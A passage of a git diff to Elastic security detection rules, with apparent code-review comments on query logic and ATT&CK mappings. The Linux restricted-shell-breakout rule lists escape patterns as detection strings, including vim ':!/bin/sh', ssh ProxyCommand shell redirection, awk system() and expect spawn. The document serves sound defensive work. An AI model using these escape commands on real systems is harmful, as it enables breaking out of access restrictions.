 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_103.json b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_103.json
index 5cd2f3cbd63..2450011a3fe 100644
--- a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_104.json b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_104.json
index d51f93c3636..454c04e0e44 100644
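Review bot: Both stages of the new `query` pin `event.dataset == "auditd_manager.auditd"`, yet `index` also lists `auditbeat-*` and `setup` presents Auditbeat as a sufficient data source; unless Auditbeat stamps its events with that exact dataset value (which I cannot confirm from here), Auditbeat-only deployments will never fire this rule, so either drop the Auditbeat index entry and setup text or widen the clause to the dataset value Auditbeat actually emits. The T1110.003 Password Spraying mapping does not match the logic: the sequence is keyed by `host.id, related.user` and requires `runs=10` failures for that one account inside `maxspan=5s`, which is the password-guessing shape, while spraying spreads attempts across accounts and never yields ten consecutive failures on one key — either drop the sub-technique or add a companion sequence keyed on `host.id` alone. The 5-second window also means an attacker pacing attempts slower than two per second is invisible to this rule, and there is no `note` or `false_positives` field to tell an analyst that, unlike the other rules in this package that ship a "Triage and analysis" note. I would add a `note` naming the fields to pivot on (`related.user`, `auditd.data.terminal`, and the source address if the auditd record carries one) and stating the throttling limitation.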
--- a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_205.json b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_205.json
index 1b7f7f4fb79..df0729d1a9e 100644
--- a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_205.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_103.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_103.json
index d5aef0c93eb..83b57d67d48 100644
--- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_103.json
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect 
the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") 
or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and 
process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;dash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/dash 0\u003c\u00262 1\u003e\u00262\")) or\n (process.parent.name in (\"nawk\", \"mawk\", \"awk\", \"gawk\") and process.parent.args : \"BEGIN {system(*)}\")\n )\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment 
for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n 
(process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn 
/bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\")) or\n (process.parent.name in (\"nawk\", \"mawk\", \"awk\", \"gawk\") and process.parent.args : \"BEGIN {system(*)}\")\n )\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -99,7 +99,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_104.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_104.json index 8d48f5cd68d..8fd72fd4743 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_104.json 
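Review bot: In the new `query`, the `process.name in ("bash", "sh", "dash","ash")` guard applies only to the `byebug`/`git`/`ftp`/`strace` term, because EQL binds `and` tighter than `or`: the `nice`/`cpulimit`/`find`/`flock` group and the `crash -h` branch that follow are independent `or` terms with no constraint on `process.name`, so a non-shell child such as `ls` from `find . -name sh -exec ls {} \;` matches through `process.parent.args in (... "sh" ...)`, `-exec` and `;`. The indentation suggests the guard was meant to wrap all three groups; changing that line to `(process.name in ("bash", "sh", "dash","ash") and (` and closing the added parenthesis after the `sensible-pager` group restores the intent. The `/* nice rule is broken in 8.2 */` comment should say what is broken and in which field so a maintainer can tell whether it still applies. This hunk is the `_103` copy of the rule, so whichever version is current should carry the same fix.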
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect 
the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\",\"nawk\", \"mawk\", \"awk\", \"gawk\", \"tar\", \"zip\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n 
(process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", 
\"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;dash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/dash 0\u003c\u00262 1\u003e\u00262\"))\n )\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised 
hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in 
(\"byebug\",\"git\",\"ftp\",\"strace\",\"nawk\", \"mawk\", \"awk\", \"gawk\", \"tar\", \"zip\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and 
process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\"))\n )\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -99,7 +99,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_105.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_105.json index 9bf5128a93e..f625af5b7a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_105.json 
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect 
the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\",\"nawk\", \"mawk\", \"awk\", \"gawk\", \"tar\", \"zip\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n 
